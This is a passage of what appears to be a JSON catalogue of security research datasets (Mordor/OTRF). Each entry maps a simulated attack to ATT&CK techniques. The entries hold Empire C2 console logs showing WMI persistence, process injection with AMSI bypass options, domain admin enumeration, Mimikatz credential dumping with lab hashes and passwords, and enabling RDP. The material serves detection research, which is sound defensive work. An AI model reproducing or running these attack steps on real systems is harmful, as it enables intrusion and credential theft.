ProxyCreds  False       default                   Proxy credentials                       \n                                                    ([domain\\]username:password) to use for \n                                                    request (default, none, or other).      \n\n(Empire: powershell/persistence/elevated/wmi) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT\n[*] Agent 13ZK6G7M tasked with task ID 1\n[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi\n(Empire: powershell/persistence/elevated/wmi) > \nWMI persistence established using listener http with OnStartup WMI subsubscription trigger.\n\n(Empire: powershell/persistence/elevated/wmi) > \n(Empire: powershell/persistence/elevated/wmi) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent PYA28EDF checked in\n[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5\n\n(Empire: powershell/persistence/elevated/wmi) > \n(Empire: powershell/persistence/elevated/wmi) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            \nW2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5584   5/0.0    2020-09-04 20:43:48  http            \n13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5676   5/0.0    2020-09-04 20:43:48  http            \n\nPYA28EDF ps 172.18.39.5     WORKSTATION5      *THESHIRE\\SYSTEM        powershell         7480   5/0.0    2020-09-04 20:49:29  http            \n\n(Empire: agents) > interact PYA28EDF\n(Empire: PYA28EDF) > shell whoami\n[*] Tasked PYA28EDF to run TASK_SHELL\n[*] Agent PYA28EDF tasked with task ID 1\n(Empire: PYA28EDF) > \nnt authority\\system\n..Command execution completed.\n\n(Empire: PYA28EDF) > \n(Empire: PYA28EDF) >"}, "references": null}, "SDWIN-190518200432": {"title": "Empire PSInject", "id": "SDWIN-190518200432", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["PE Injection", "WriteProcessMemory", "CreateRemoteThread Execution"], "description": "This dataset represents adversaries reflectively loading/intecting a portable executable (PE) (not on disk) into a process via WriteprocessMemory and executed via CreateRemoteThread APIs", "attack_mappings": [{"technique": "T1055", "sub-technique": "003", "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_psinject_PEinjection.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "PSInject", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/management/Invoke-PSInject.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "[*] Active agents:\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n62HY9XCK ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         3172   5/0.0    2020-08-07 14:30:45  http            \nF82SZKVW ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6008   5/0.0    2020-08-07 18:31:11  http            \n\n(Empire: agents) > interact F82SZKVW\n(Empire: F82SZKVW) > \n(Empire: F82SZKVW) > \n(Empire: F82SZKVW) > usemodule management/psinject\n(Empire: powershell/management/psinject) > \n(Empire: powershell/management/psinject) > set ProcName notepad\n(Empire: powershell/management/psinject) > set Listener http\n(Empire: powershell/management/psinject) > info\n\n              Name: Invoke-PSInject\n            Module: powershell/management/psinject\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n  @sixdub\n  leechristensen (@tifkin_)\n\nDescription:\n  Utilizes Powershell to to inject a Stephen Fewer formed\n  ReflectivePick which executes PS codefrom memory in a remote\n  process. ProcID or ProcName must be specified.\n\nComments:\n  http://sixdub.net\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        F82SZKVW                  Agent to run module on.                 \n  ProcId           False                                 ProcessID to inject into.               \n  ProcName         False       notepad                   Process name to inject into.            \n  Listener         True        http                      Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/management/psinject) > execute\n[*] Tasked F82SZKVW to run TASK_CMD_JOB\n[*] Agent F82SZKVW tasked with task ID 1\n[*] Tasked agent F82SZKVW to run module powershell/management/psinject\n(Empire: powershell/management/psinject) > \nJob started: F48GDZ\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent Y9RCLV64 checked in\n[+] Initial agent Y9RCLV64 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to Y9RCLV64 at 172.18.39.5\n\n(Empire: powershell/management/psinject) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n62HY9XCK ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         3172   5/0.0    2020-08-07 14:30:45  http            \nF82SZKVW ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6008   5/0.0    2020-08-07 18:32:51  http            \nY9RCLV64 ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       notepad            2576   5/0.0    2020-08-07 18:32:52  http            \n\n(Empire: agents) >"}, "references": ["https://powersploit.readthedocs.io/en/latest/CodeExecution/Invoke-ReflectivePEInjection/", "https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick#psinjectps1"]}, "SDWIN-190518201207": {"title": "Empire Shell Net Domain Admins", "id": "SDWIN-190518201207", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Domain Groups Enumeration", "RPC SAMR SamrQueryInformationGroup"], "description": "This dataset represents adversaries enumerating members of domain groups (i.e. Domain Admins) via RPC SAMR interface over SMB. Some of the main RPC methods captured over the network are SamrLookupNamesInDomain (Opnum 17) and SamrQueryInformationGroup (Opnum 20) where there are indicators about the specific group name enumerated.", "attack_mappings": [{"technique": "T1069", "sub-technique": "002", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_rpc_samr_smb_group_domain_admins_standard_user.zip"}, {"type": "network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_shell_rpc_samr_smb_group_domain_admins_standard_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}], "permissions_required": ["User"], "adversary_view": "(Empire: stager/multi/launcher) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent GM4LN8V9 checked in\n[+] Initial agent GM4LN8V9 from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to GM4LN8V9 at 172.18.39.6\nagents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\nGM4LN8V9 ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         5724   5/0.0    2020-09-21 08:05:25  http            \n\n(Empire: agents) > interact GM4LN8V9\n(Empire: GM4LN8V9) > shell net group \"Domain Admins\" /domain\n[*] Tasked GM4LN8V9 to run TASK_SHELL\n[*] Agent GM4LN8V9 tasked with task ID 1\n(Empire: GM4LN8V9) > \nThe request will be processed at a domain controller for domain theshire.local.\n\nGroup name     Domain Admins\nComment        Designated administrators of the domain\n\nMembers\n\n-------------------------------------------------------------------------------\nmscott                   pgustavo                 wardog                   \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: GM4LN8V9) >"}, "references": null}, "SDWIN-190518201922": {"title": "Empire WDigest Downgrade", "id": "SDWIN-190518201922", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Registry Modification", "Windows Registry WDigest"], "description": "This dataset represents adversaries setting the UseLogonCredential property value from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest key to 1 to enable plain text passwords.", "attack_mappings": [{"technique": "T1112", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "WDigest Downgrade", "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190510202010.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_wdigest_downgrade.tar.gz"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "wdigest_downgrade", "script": "https://github.com/EmpireProject/Empire/blob/dev/lib/modules/powershell/management/wdigest_downgrade.py"}], "permissions_required": ["Administrator"], "adversary_view": null}, "references": null}, "SDWIN-190518202151": {"title": "Empire Mimikatz LogonPasswords", "id": "SDWIN-190518202151", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["LSASS Memory Credentials Read"], "description": "This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "LSASS Access from Non System Account", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_logonpasswords.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "credentials", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n62HY9XCK ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         3172   5/0.0    2020-08-07 14:30:45  http            \nB7Y8G4XC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         1648   5/0.0    2020-08-07 14:31:46  http            \n\n(Empire: agents) > interact B7Y8G4XC\n(Empire: B7Y8G4XC) > \n(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/logonpasswords*\n(Empire: powershell/credentials/mimikatz/logonpasswords) > info\n\n              Name: Invoke-Mimikatz DumpCreds\n            Module: powershell/credentials/mimikatz/logonpasswords\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract\n  plaintext credentials from memory.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        B7Y8G4XC                  Agent to run module on.                 \n\n(Empire: powershell/credentials/mimikatz/logonpasswords) > execute\n[*] Tasked B7Y8G4XC to run TASK_CMD_JOB\n[*] Agent B7Y8G4XC tasked with task ID 1\n[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/logonpasswords\n(Empire: powershell/credentials/mimikatz/logonpasswords) > \nJob started: FH5UKE\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug  4 2020 20:16:54\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # sekurlsa::logonpasswords\n\nAuthentication Id : 0 ; 2868007 (00000000:002bc327)\nSession           : RemoteInteractive from 2\nUser Name         : pgustavo\nDomain            : THESHIRE\nLogon Server      : MORDORDC\nLogon Time        : 8/5/2020 9:46:24 PM\nSID               : S-1-5-21-1363495622-3806888128-621328882-1104\n        msv :\n        [00000003] Primary\n        * Username : pgustavo\n        * Domain   : THESHIRE\n        * NTLM     : 81d310fa34e6a56a31145445891bb7b8\n        * SHA1     : 2a953d745ed80427e309d957d20b0eeca3cd3d69\n        * DPAPI    : be8815c8ec59ddeda43d2301dbc29c2c\n        tspkg :\n        wdigest :\n        * Username : pgustavo\n        * Domain   : THESHIRE\n        * Password : W1n1!2019\n        kerberos :\n        * Username : pgustavo\n        * Domain   : THESHIRE.LOCAL\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 2860578 (00000000:002ba622)\nSession           : RemoteInteractive from 2\nUser Name         : pgustavo\nDomain            : THESHIRE\nLogon Server      : MORDORDC\nLogon Time        : 8/5/2020 9:46:24 PM\nSID               : S-1-5-21-1363495622-3806888128-621328882-1104\n        msv :\n        [00000003] Primary\n        * Username : pgustavo\n        * Domain   : THESHIRE\n        * NTLM     : 81d310fa34e6a56a31145445891bb7b8\n        * SHA1     : 2a953d745ed80427e309d957d20b0eeca3cd3d69\n        * DPAPI    : be8815c8ec59ddeda43d2301dbc29c2c\n        tspkg :\n        wdigest :\n        * Username : pgustavo\n        * Domain   : THESHIRE\n        * Password : W1n1!2019\n        kerberos :\n        * Username : pgustavo\n        * Domain   : THESHIRE.LOCAL\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 2778269 (00000000:002a649d)\nSession           : Interactive from 2\nUser Name         : DWM-2\nDomain            : Window Manager\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:46:21 PM\nSID               : S-1-5-90-0-2\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 2776485 (00000000:002a5da5)\nSession           : Interactive from 2\nUser Name         : DWM-2\nDomain            : Window Manager\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:46:21 PM\nSID               : S-1-5-90-0-2\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 2771168 (00000000:002a48e0)\nSession           : Interactive from 2\nUser Name         : UMFD-2\nDomain            : Font Driver Host\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:46:20 PM\nSID               : S-1-5-96-0-2\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 997 (00000000:000003e5)\nSession           : Service from 0\nUser Name         : LOCAL SERVICE\nDomain            : NT AUTHORITY\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:08 PM\nSID               : S-1-5-19\n        msv :\n        tspkg :\n        wdigest :\n        * Username : (null)\n        * Domain   : (null)\n        * Password : (null)\n        kerberos :\n        * Username : (null)\n        * Domain   : (null)\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 56937 (00000000:0000de69)\nSession           : Interactive from 1\nUser Name         : DWM-1\nDomain            : Window Manager\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:08 PM\nSID               : S-1-5-90-0-1\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 56865 (00000000:0000de21)\nSession           : Interactive from 1\nUser Name         : DWM-1\nDomain            : Window Manager\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:08 PM\nSID               : S-1-5-90-0-1\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 996 (00000000:000003e4)\nSession           : Service from 0\nUser Name         : WORKSTATION5$\nDomain            : THESHIRE\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:07 PM\nSID               : S-1-5-20\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : workstation5$\n        * Domain   : THESHIRE.LOCAL\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 33194 (00000000:000081aa)\nSession           : Interactive from 0\nUser Name         : UMFD-0\nDomain            : Font Driver Host\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:07 PM\nSID               : S-1-5-96-0-0\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 33086 (00000000:0000813e)\nSession           : Interactive from 1\nUser Name         : UMFD-1\nDomain            : Font Driver Host\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:07 PM\nSID               : S-1-5-96-0-1\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 31553 (00000000:00007b41)\nSession           : UndefinedLogonType from 0\nUser Name         : (null)\nDomain            : (null)\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:07 PM\nSID               : \n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        kerberos :\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 999 (00000000:000003e7)\nSession           : UndefinedLogonType from 0\nUser Name         : WORKSTATION5$\nDomain            : THESHIRE\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:06 PM\nSID               : S-1-5-18\n        msv :\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n        kerberos :\n        * Username : workstation5$\n        * Domain   : THESHIRE.LOCAL\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nmimikatz(powershell) # exit\nBye!\n\n(Empire: powershell/credentials/mimikatz/logonpasswords) >"}, "references": null}, "SDWIN-190518203650": {"title": "Empire Enable RDP", "id": "SDWIN-190518203650", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Registry Modification", "Windows Registry RDP Settings"], "description": "This dataset represents adversaries enabling RDP and adding a firewall exception to a compromised system", "attack_mappings": [{"technique": "T1112", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": null, "datasets": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_enable_rdp.tar.gz"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "management", "script": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: TKV35P8X) > usemodule management/enable_rdp*           \n(Empire: powershell/management/enable_rdp) > info\n\n              Name: Enable-RDP\n            Module: powershell/management/enable_rdp\n        NeedsAdmin: True\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Enables RDP on the remote machine and adds a firewall\n  exception.\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        TKV35P8X                  Agent to run module on.                 \n\n(Empire: powershell/management/enable_rdp) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked TKV35P8X to run TASK_CMD_WAIT\n[*] Agent TKV35P8X tasked with task ID 21\n[*] Tasked agent TKV35P8X to run module powershell/management/enable_rdp\n(Empire: powershell/management/enable_rdp) > The operation completed successfully.\n(Empire: powershell/management/enable_rdp) >"}, "references": null}, "SDWIN-190518210125": {"title": "Empire Invoke SMBExec", "id": "SDWIN-190518210125", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC CreateService", "RPC StartService", "SMB Svcctl"], "description": "This dataset represents adversaries remotely creating and starting a service via RPC methods over SMB named pipes such as svcctl.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_smbexec_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_smbexec_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_smbexec", "script": 